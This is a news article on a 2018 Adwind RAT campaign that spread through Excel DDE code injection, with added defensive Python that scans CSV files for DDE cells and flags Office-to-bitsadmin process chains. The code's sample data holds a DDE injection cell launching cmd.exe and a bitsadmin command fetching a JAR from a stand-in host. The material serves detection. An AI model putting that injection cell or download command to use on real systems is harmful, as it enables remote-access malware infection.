
Security researchers have discovered a new Adwind RAT campaign targeting Windows, Linux and Mac users

Security researchers have discovered a new Adwind RAT campaign targeting Windows, Linux and Mac users. The campaign has been active since August 26, 2018, and was discovered by researchers at ReversingLabs and Cisco Talos. According to the researchers, the spam campaign spreads version 3.0 of the Adwind remote access tool (RAT), and its droppers use a new variant of the Dynamic Data Exchange (DDE) code injection attack against Microsoft Excel. Because the Adwind payload is a Java archive, the same dropper can infect any platform with a Java runtime. The new variant also evades detection by most anti-malware software.

The attackers used two different droppers in this campaign, carrying either the .csv or the .xlt extension, both of which Excel opens by default. Both droppers rely on the same new variant of the DDE code injection attack: although the technique itself has been known for years, this variant was still going undetected. The dropper works under any of 35 file extensions, but Excel is not associated with all of them by default; for the non-default extensions the attacker relies on a script that starts Excel with the file as a command-line parameter. "Formats like CSV don't have a predefined header, thus they can contain any kind of data at the beginning. Having random data like in the samples we found may trick the anti-virus into skipping the file scanning. Other formats may be considered corrupted, as they might not follow the expected format," Cisco Talos researchers said in their analysis.

The attack still requires user interaction: Excel displays two warnings before any code runs. The first appears when Excel recognises that the opened file is not a real XLT document; it reports that the file may be corrupted and asks whether the user wants to open it anyway. The second warns the user that the document is about to execute the application "CMD.exe". Only if the user accepts both warnings is the command executed. According to the researchers, the injected command creates and executes a VBScript.
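A scanner for this dropper shape, added here as an example and not code from Cisco Talos, ReversingLabs or the campaign itself: it reads a CSV-style file the way Excel would, flags any cell that starts with a formula character and uses the DDE launch syntax (`=cmd|'...'!A0`, `=DDE(...)`, `=DDEAUTO(...)`), and separately notes when the file begins with non-text bytes, the padding the quote above describes. Both sample files are constructed for the demo, and the `.vbs` path inside the DDE cell is hypothetical.

```python
"""Flag DDE code injection in CSV-style files, regardless of what precedes the rows."""
import csv
import re

# Excel evaluates a cell as a formula when it begins with one of these characters.
FORMULA_START = "=+-@"

# Classic Excel DDE launch syntax: =app|'topic'!item, e.g. =cmd|'/c calc'!A0.
DDE_PIPE = re.compile(r"^[=+\-@][^|]{1,200}\|.*!")
# Explicit DDE functions: =DDE(...) / =DDEAUTO(...).
DDE_FUNC = re.compile(r"^[=+\-@]\s*DDE(?:AUTO)?\s*\(", re.IGNORECASE)


def _is_number(cell: str) -> bool:
    """'-1200' or '+3' is a number to Excel, not a formula."""
    try:
        float(cell)
        return True
    except ValueError:
        return False


def scan_csv_bytes(data: bytes) -> dict:
    """Return {'junk_header': bool, 'dde': [(row, col, cell)], 'formula_cells': int}.

    The file is decoded as latin-1 so arbitrary leading bytes never abort the
    scan: a scanner that gives up on a file because it looks corrupt is exactly
    what this dropper counts on.
    """
    text = data.decode("latin-1").replace("\x00", "")
    lines = re.split(r"\r\n|\r|\n", text)
    first = lines[0] if lines else ""
    # CSV has no fixed header, so Excel tolerates garbage ahead of the table;
    # non-printable bytes there are a strong sign the file was padded to evade AV.
    junk_header = any(not (ch.isprintable() or ch == "\t") for ch in first)

    result = {"junk_header": junk_header, "dde": [], "formula_cells": 0}
    for row_no, row in enumerate(csv.reader(lines), start=1):
        for col_no, cell in enumerate(row, start=1):
            cell = cell.strip()
            if not cell or cell[0] not in FORMULA_START or _is_number(cell):
                continue
            result["formula_cells"] += 1
            if DDE_PIPE.match(cell) or DDE_FUNC.match(cell):
                result["dde"].append((row_no, col_no, cell))
    return result


# Constructed samples for the demo (not the campaign's real droppers).
DROPPER_LIKE = (
    b"\x8a\x13\xf4 padding bytes where a CSV header would be \x01\x02\r\n"
    b"Invoice,Amount\r\n"
    b"ACME Corp,1200\r\n"
    # Hypothetical DDE cell: cmd.exe runs the script host on a dropped .vbs.
    b"=cmd|'/c cscript.exe %TEMP%\\update.vbs'!A0,0\r\n"
)
BENIGN = b"Item,Qty,Total\r\nWidget,2,=B2*3\r\nTotal,,=SUM(C2:C2)\r\n"

if __name__ == "__main__":
    for label, blob in (("dropper-like", DROPPER_LIKE), ("benign", BENIGN)):
        r = scan_csv_bytes(blob)
        verdict = "DDE INJECTION" if r["dde"] else "clean"
        print(f"{label}: {verdict}, junk header={r['junk_header']}, "
              f"formula cells={r['formula_cells']}, hits={r['dde']}")
```

The scan is deliberately extension-agnostic: apply it to every file Excel can be coaxed into opening, not just `.csv` and `.xlt`, since the same bytes under another extension are still handed to Excel by the attacker's launcher script.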
The VBScript uses bitsadmin, a Microsoft command-line tool for creating download or upload jobs and monitoring their progress, to fetch the final payload, a Java archive (JAR) file containing the RAT. "The DDE variant used by the droppers in this campaign is a good example of how signature-based antivirus software can be tricked. It is also a warning sign regarding file extension-scanning configurations. This kind of injection has been known for years, however, this actor found a way to modify it in order to have an extremely low detection ratio." For more details, see the analysis published by Cisco Talos here and the analysis published by ReversingLabs here.
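The execution chain described above (Excel, then cmd.exe, then a VBScript host, then bitsadmin fetching the JAR) is visible in process-creation telemetry even when the dropper file itself slips past the scanner. The detection below is an added example, not code from either vendor: it walks constructed records shaped like Sysmon Event ID 1 fields (pid, ppid, image, command line) and raises on an Office application spawning a shell, and on a `bitsadmin /transfer` with an Office application anywhere in its ancestry. The PIDs, user path and URLs are invented.

```python
"""Find Office -> shell -> script host -> bitsadmin download chains in process events."""
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DOWNLOADERS = {"bitsadmin.exe"}


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def ancestry(by_pid: dict, pid: int) -> list:
    """Process names from `pid` up to the oldest ancestor we hold a record for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # `seen` guards against PID reuse loops
        seen.add(pid)
        chain.append(_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_suspicious(events: list) -> list:
    """Return (rule, chain) pairs, chain listed child-first.

    office_spawns_shell: an Office app started cmd/powershell, which is the
    stage Excel's second warning ("will execute CMD.exe") refers to.
    office_bitsadmin_download: bitsadmin /transfer with an Office app somewhere
    in its ancestry, the stage that fetches the JAR payload.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        name = _name(ev["image"])
        chain = ancestry(by_pid, ev["pid"])
        parent = chain[1] if len(chain) > 1 else ""
        if name in SHELLS and parent in OFFICE_APPS:
            alerts.append(("office_spawns_shell", chain))
        cmd = ev["cmdline"].lower()
        if name in DOWNLOADERS and "/transfer" in cmd and any(n in OFFICE_APPS for n in chain):
            alerts.append(("office_bitsadmin_download", chain))
    return alerts


# Constructed events (Sysmon Event ID 1 style); PIDs, paths and URLs are invented.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 50, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 100, "ppid": 50, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": rf'"EXCEL.EXE" "{TEMP}\invoice.csv"'},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": rf"cmd.exe /c cscript.exe {TEMP}\update.vbs"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": rf"cscript.exe {TEMP}\update.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": rf"bitsadmin /transfer upd /download /priority high http://payload.invalid/p.jar {TEMP}\p.jar"},
    # Benign: a service using BITS has no Office app in its ancestry.
    {"pid": 20, "ppid": 1, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 500, "ppid": 20, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer wu /download http://update.invalid/x.cab C:\Windows\Temp\x.cab"},
]

if __name__ == "__main__":
    for rule, chain in find_suspicious(SAMPLE_EVENTS):
        print(f"{rule}: {' <- '.join(chain)}")
```

Keying on the parent chain rather than on bitsadmin alone is what keeps the benign BITS job quiet; the same ancestry check generalises to other living-off-the-land downloaders (certutil, curl, PowerShell's web cmdlets) by extending `DOWNLOADERS` and the command-line test.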
